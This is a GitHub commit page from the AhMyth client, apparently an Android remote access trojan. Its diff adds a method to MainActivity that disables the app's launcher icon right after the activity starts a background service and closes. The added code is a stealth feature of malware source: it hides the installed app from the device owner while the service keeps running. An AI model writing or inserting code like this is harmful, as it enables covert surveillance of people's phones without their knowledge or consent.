We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 563488a + 007e073 commit fb384a7Copy full SHA for fb384a7
AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/MainActivity.java
@@ -21,9 +21,15 @@ protected void onCreate(Bundle savedInstanceState) {
21
setContentView(R.layout.activity_main);
22
startService(new Intent(this, MainService.class));
23
finish();
24
+ fn_hideicon();
25
}
26
27
+private void fn_hideicon() {
28
29
+ getPackageManager().setComponentEnabledSetting(getComponentName(),
30
+ PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
31
+ PackageManager.DONT_KILL_APP);
32
+ }
33
34
35
0 commit comments